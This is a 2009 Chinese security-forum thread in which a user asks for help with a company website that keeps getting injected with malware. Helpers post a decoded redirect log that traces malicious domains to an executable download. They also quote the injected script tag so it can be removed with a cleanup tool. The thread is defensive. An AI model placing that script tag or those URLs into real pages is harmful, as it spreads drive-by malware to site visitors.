瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 求助:我们公司网站老是被挂马,怎么办呀!
冰淇淋小子 - 2009-7-31 23:14:00
因为挂马了,所以无法提供地址给你们,怎么办呀!

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAXTHON 2.0)
冰淇淋小子 - 2009-7-31 23:15:00
http://www.ydyyw.com/default.aspx
ty88 - 2009-7-31 23:30:00
关于:hxxp://www.ydyyw.com/default.aspx解密的日志(全体输出 -  31):

Level  0>http://www.ydyyw.com/default.aspx
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/200942415649236.jpg&tw=70&th=70
Level  1>http://qvoev323.cn/c.js
Level  2>http://5u66j.cn/aa/a3a.htm
Level  3>http://s6.cnzz.com/stat.php?id=1408284&web_id=1408284
Level  3>http://img.tongji.linezing.com/1137761/tongji.gif
Level  3>http://js.tongji.linezing.com/1137761/tongji.js
Level  3>http://5u66j.cn/aa/360.htm
Level  4>http://5u66j.cn/aa/pp.htm
Level  4>http://5u66j.cn/aa/02.htm
Level  5>http://5u66j.cn/aa/s1
Level  5>http://5u66j.cn/aa/02.js
Level  6>http://chulaiba.net/svchost.exe
Level  4>http://5u66j.cn/aa/test.htm
Level  4>http://5u66j.cn/aa/he.htm
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/200942415142970.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424143731782.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/20094241431211.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424142527814.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424141042532.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/2009424134652189.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009424/20094241258301.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423164225829.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/200942316231329.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423155913298.gif&tw=70&th=70
Level  1>http://www.ydyyw.com/getthumbnail2.aspx?fn=uploadimages/2009423/2009423155523423.jpg&tw=70&th=70
Level  1>http://www.ydyyw.com/ht
Level  1>http://www.ydyyw.com/http
Level  1>http://www.ydyyw.com/js/jquery-1.2.6.pack.js
Level  1>http://www.ydyyw.com/scripts/scroll_door_hover.js

日志由 Redoce2.0第19次修正版于 2009-7-31 23:28:49 生成。

这个毒看到都要吐了。。。。
清除方法是有的就是比较麻烦
superlover - 2009-7-31 23:30:00
该用户帖子内容已被屏蔽
ty88 - 2009-7-31 23:33:00


引用:
原帖由 superlover 于 2009-7-31 23:30:00 发表
请加QQ ,专业提供网站/服务器安全检测、安全维护等服务,可以完全防御除DDOS以外的任何攻击。

不要做广告
修复方法一会上传
ty88 - 2009-7-31 23:42:00
这样填写即可

引用:
<script src=http://qvoev323.cn/c.js></script>
如图
程序已上传

附件: HTMLDisinfect.rar
太行定一方风云 - 2009-7-31 23:48:00
该用户帖子内容已被屏蔽
ty88 - 2009-7-31 23:52:00
如果以上方法无法清除
请尝试
http://www.520hack.com/Soft/Soft5/200904/14289.html
http://www.zzx8.com/html/s14305.html
http://www.newjian.com/Anti-virus/anti_virus_2028.html
这些工具
如果依然不行欢迎联系我
或者找瑞星的网址区版主孔子
不过好像孔子要收费:kaka12:
安全初级工程师 - 2009-8-1 8:44:00
该用户帖子内容已被屏蔽
冰淇淋小子 - 2009-8-1 9:09:00
我知道了,谢谢!
冰淇淋小子 - 2009-8-1 9:23:00
是什么原因了,公司技术员也查不出什么地方导致攻击的。因为不是一次两次了
苍宇星尘 - 2009-8-1 11:32:00
猪一样的
现在漏洞多
肯定走后门入的
Bloodgod - 2009-8-1 12:16:00
如果是多次被中毒,要尝试从程序上解决问题,而不是来这里找杀毒的。
就是按照楼上的方法把病毒连接去掉,过段时间还是会中毒的
要你们的技术员好好的检查哈代码吧。
Bloodgod - 2009-8-1 12:17:00
另外让你们的服务器管理员分析一下网站的日志记录,看能否找到问题。
1
查看完整版本: 求助:我们公司网站老是被挂马,怎么办呀!
© 2000 - 2024 Rising Corp. Ltd.